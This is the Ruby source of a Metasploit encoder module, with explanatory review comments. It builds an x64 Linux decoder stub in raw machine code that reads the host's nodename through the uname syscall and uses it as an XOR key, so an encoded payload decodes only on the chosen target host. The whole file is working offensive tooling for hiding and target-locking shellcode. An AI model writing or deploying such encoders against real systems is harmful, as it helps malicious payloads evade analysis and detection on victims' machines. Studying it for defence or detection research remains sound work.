##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Encoder::Xor
  # Context-keyed XOR encoder for x64 Linux payloads.
  #
  # The 8-byte XOR key is derived on the framework side from the C_HOSTNAME
  # option (obtain_key). The emitted decoder stub (decoder_stub) recovers the
  # same key at run time from the nodename field returned by the uname
  # syscall, so the payload only decodes correctly on a host whose nodename
  # matches C_HOSTNAME; on any other host the XOR pass yields garbage.

  # Registers module metadata and the C_HOSTNAME option.
  #
  # The Decoder metadata (8-byte key packed with 'Q', 8-byte blocks) matches
  # the qword-at-a-time XOR performed by the stub below.
  def initialize
    super(
      'Name' => 'Hostname-based Context Keyed Payload Encoder',
      'Description' => 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.',
      'Author' => [
        'sf',
        'oso'
      ],
      'Arch' => ARCH_X64,
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Decoder' => {
        'KeySize' => 8,
        'KeyPack' => 'Q',
        'BlockSize' => 8
      }
    )

    # The nodename the running host is expected to report. The default
    # literal 'hostname' is only a placeholder value.
    register_options([ OptString.new('C_HOSTNAME', [ true, 'Context Hostname.', 'hostname'])])
  end

  # Derives the XOR key from C_HOSTNAME and stores it in state.key.
  #
  # The sliced hostname is reversed before hex-decoding so that the resulting
  # integer, once packed with 'Q' on a little-endian host, reproduces the
  # hostname bytes in memory order -- the same qword the stub loads from the
  # utsname nodename field. `reverse!` mutates only the fresh slice, not the
  # datastore value. Hostnames shorter than 8 bytes give a key whose high
  # bytes are zero.
  #
  # @param _buf [String] unused
  # @param _badchars [String] unused; the key is not checked against badchars
  # @param state [Msf::EncoderState] receives the key in state.key
  # @return [Integer] the key (also assigned to state.key)
  def obtain_key(_buf, _badchars, state)
    # TODO: Currently only first 8 chars are taken as key. We should include the other chars in the key.
    # NOTE(review): [0..8] is an inclusive range and yields up to 9 characters,
    # one more than KeySize. Whether the extra byte is silently dropped by
    # 64-bit 'Q' packing or causes an error depends on how state.key is
    # consumed outside this file -- confirm.
    state.key = datastore['C_HOSTNAME'][0..8].reverse!.unpack('H*')[0].to_i(16)
  end

  # Builds the x64 Linux decoder stub that is prepended to the encoded payload.
  #
  # The stub issues sys_uname with the stack pointer as destination, loads the
  # first 8 bytes of the nodename as the XOR key, then walks the encoded blocks
  # that follow the stub and XORs each qword in place. The offsets inside the
  # stub (the rip-relative lea, the 0x1d displacement and the loop target)
  # assume the exact byte layout below; any change to the stub bytes must keep
  # them consistent.
  #
  # @param state [Msf::EncoderState] provides buf (payload) and decoder_key_size
  # @return [String] raw machine code
  def decoder_stub(state)
    # calculate the (negative) block count . We should check this against state.badchars.
    # ceil(len / key_size), negated and packed as a 32-bit little-endian
    # immediate; the `sub rcx` below turns it back into a positive count.
    block_count = [-(((state.buf.length - 1) / state.decoder_key_size) + 1)].pack('V')

    decoder = '' +
      # get hostname
      "\x6a\x3f\x58" + # push 0x3f; pop rax ; 0x3f = sys_uname on x86_64 Linux
      "\x48\x8D\x3C\x24" + # lea rdi, [rsp] ; struct utsname is written starting at rsp
      "\x0F\x05" + # syscall ; LINUX - sys_uname
      # NOTE: the kernel fills the whole struct utsname (6 x 65 bytes) at rsp,
      # so the stub overwrites whatever the caller keeps just above the stack pointer.
      "\x48\x8B\x5F\x41" + # mov rbx, [rdi+0x41]; first 8 bytes of nodename (0x41 = 65 skips the sysname field)

      # loop
      "\x48\x31\xC9" + # xor rcx, rcx
      "\x48\x81\xE9" + block_count + # sub rcx, imm32 -> rcx = block count (written as a sub of a negative immediate; presumably to keep NUL bytes out of the stub -- not verified against badchars, see above)
      "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rip - 0x11] ; rax = stub start + 0x0d
      "\x48\x31\x58\x1d" + # xor [rax+0x1d], rbx ; 0x0d + 0x1d = 0x2a = stub length, so the first target is the byte right after the stub
      "\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8 ; advance to the next 8-byte block
      "\xE2\xF4" # loop rel8 -0x0c ; back to the xor while rcx != 0
    return decoder
  end
end